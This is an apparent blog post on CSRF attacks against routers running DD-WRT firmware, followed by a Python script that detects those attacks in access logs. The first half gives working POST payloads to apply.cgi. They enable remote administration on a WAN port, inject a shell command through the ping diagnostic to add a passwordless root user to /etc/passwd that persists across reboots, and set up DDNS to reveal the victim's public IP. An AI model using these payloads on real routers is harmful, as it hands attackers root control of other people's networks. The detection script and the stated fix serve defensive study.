Saturday, February 18, 2012

Attacking wireless routers running DD-WRT

The previous post discussed CSRF attacks on DSL modems. A similar attack is possible on routers running the DD-WRT firmware. This post walks through a few variants that end with the attacker taking control of the router via a small piece of JavaScript hosted on another website.

All requests are made to the target's "apply.cgi". Likely LAN addresses for the router are 192.168.1.1, 192.168.0.1, 10.0.0.1, 10.0.1.1, and so on.


1. Enable remote HTTP administration on port 8989

The following POST request needs to be made:

submit_button=Management&action=ApplyTake&remote_management=1&http_wanport=8989

2. Add a new user (outsider) to the system with UID 0 and an empty password
POST request that re-adds the user on every boot (the command is saved as a startup command):

submit_button=Ping&action=Apply&submit_type=startup&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

POST request that adds the user immediately (the entry is lost when the router reboots, so it is used together with the previous request):

submit_button=Ping&action=ApplyTake&submit_type=start&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

3. Add a DDNS entry so the victim's public IP can be obtained (needed unless the attack is aimed at a fixed, already-known public IP):
POST request when the DDNS provider is afraid.org:

submit_button=DDNS&action=ApplyTake&change_action=&submit_type=&ddns_enable=2&ddns_username_2=uname&ddns_passwd_2=passwrd&ddns_hostname_2=wrtvictim.net&ddns_wan_ip=0&ddns_force=1

* For other providers, different values of the ddns_enable parameter can be tried. In the request above the provider is afraid.org, the username is uname, the password is passwrd and the hostname is wrtvictim.net.


Once an attacker controls the router, many other things become possible: setting up port-forwarding rules, pointing DHCP clients at a rogue DNS server, configuring the router as a VPN server or client, adding access restrictions that block certain domains, placing a chosen host in the DMZ, and so on. Though I haven't tried it yet, a modified firmware could also be uploaded through the upgrade functionality. If the upgrade is not allowed over the remote-administration port, port forwarding can be set up so that the connection appears to originate from the LAN.
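Every step above is a POST to apply.cgi that a legitimate administrator would only ever send from a page served by the router itself, which is what makes the requests recognisable after the fact. The following detection script is an added example, not code from the original post or from the DD-WRT project. It assumes HTTP access logs in Apache "combined" format with one extra quoted field holding the POST body (a lab proxy or packet-capture post-processing in front of the admin interface; DD-WRT's own httpd does not write such logs), and it assumes the router's LAN address is 192.168.1.1. The sample log lines are constructed and reuse the request bodies from the three steps, with benign same-origin requests mixed in so the rules can be seen to discriminate.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: Apache combined log format plus a trailing quoted POST body.
# The logging format itself is an assumption for a lab setup, not DD-WRT's own.
SAMPLE_LOG = """\
192.168.1.23 - - [18/Feb/2012:10:01:02 +0000] "POST /apply.cgi HTTP/1.1" 200 512 "http://192.168.1.1/Management.asp" "Mozilla/5.0" "submit_button=Management&action=ApplyTake&remote_management=0"
192.168.1.23 - - [18/Feb/2012:10:05:10 +0000] "POST /apply.cgi HTTP/1.1" 200 512 "http://attacker.example/page.html" "Mozilla/5.0" "submit_button=Management&action=ApplyTake&remote_management=1&http_wanport=8989"
192.168.1.23 - - [18/Feb/2012:10:05:11 +0000] "POST /apply.cgi HTTP/1.1" 200 512 "http://attacker.example/page.html" "Mozilla/5.0" "submit_button=Ping&action=ApplyTake&submit_type=start&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd"
192.168.1.23 - - [18/Feb/2012:10:06:00 +0000] "POST /apply.cgi HTTP/1.1" 200 512 "http://192.168.1.1/Diagnostics.asp" "Mozilla/5.0" "submit_button=Ping&action=ApplyTake&submit_type=start&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=8.8.8.8"
192.168.1.23 - - [18/Feb/2012:10:07:00 +0000] "POST /apply.cgi HTTP/1.1" 200 512 "http://attacker.example/page.html" "Mozilla/5.0" "submit_button=DDNS&action=ApplyTake&change_action=&submit_type=&ddns_enable=2&ddns_username_2=uname&ddns_passwd_2=passwrd&ddns_hostname_2=wrtvictim.net&ddns_wan_ip=0&ddns_force=1"
192.168.1.23 - - [18/Feb/2012:10:07:30 +0000] "POST /apply.cgi HTTP/1.1" 200 512 "http://attacker.example/page.html" "Mozilla/5.0" "submit_button=Ping&action=Apply&submit_type=startup&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<body>[^"]*)"$'
)

# Assumption: the router's own LAN address. Genuine admin submissions originate
# from pages the router served, so their Referer host is one of these.
ROUTER_HOSTS = {"192.168.1.1"}


def looks_like_host(value):
    """True if value is a bare IP address or DNS name, i.e. what ping_ip should hold."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return re.fullmatch(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?", value) is not None


def analyse_line(line):
    """Return a list of findings for one log line (empty if nothing is suspicious)."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST" or not m["path"].endswith("/apply.cgi"):
        return []
    # parse_qs URL-decodes the body, so the ping_ip value is seen as the shell would see it.
    params = {k: v[0] for k, v in parse_qs(m["body"], keep_blank_values=True).items()}
    findings = []
    referer_host = urlsplit(m["referer"]).hostname
    if referer_host not in ROUTER_HOSTS:
        findings.append(f"cross-site or missing Referer: {referer_host or '<none>'}")
    if params.get("remote_management") == "1":
        findings.append(f"remote management enabled on WAN port {params.get('http_wanport', '?')}")
    if "ping_ip" in params and not looks_like_host(params["ping_ip"]):
        findings.append(f"ping_ip is not a host: {params['ping_ip']!r}")
    if params.get("submit_type") == "startup":
        findings.append("diagnostic command persisted as a startup command")
    if params.get("submit_button") == "DDNS" and params.get("ddns_enable", "0") != "0":
        hosts = [v for k, v in params.items() if k.startswith("ddns_hostname")]
        findings.append(f"DDNS enabled (ddns_enable={params['ddns_enable']}) for {', '.join(hosts) or '?'}")
    return findings


def scan(log_text):
    """Map 1-based line numbers to their findings for every line that has any."""
    report = {}
    for lineno, line in enumerate(log_text.splitlines(), 1):
        findings = analyse_line(line)
        if findings:
            report[lineno] = findings
    return report


if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(f"line {lineno}:")
        for finding in findings:
            print(f"  - {finding}")
```

Lines 1 and 4 of the sample (a same-origin Management submission and a ping of 8.8.8.8) produce no findings; lines 2, 3, 5 and 6 are each flagged twice or three times, and the Referer rule alone catches all four even when the body is unremarkable. The Referer check is the detection-side counterpart of the real fix, which is for apply.cgi to require a per-session anti-CSRF token and to reject submissions whose Origin or Referer is not the router itself; the ping_ip rule is the counterpart of validating that parameter as an address before it ever reaches a shell.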
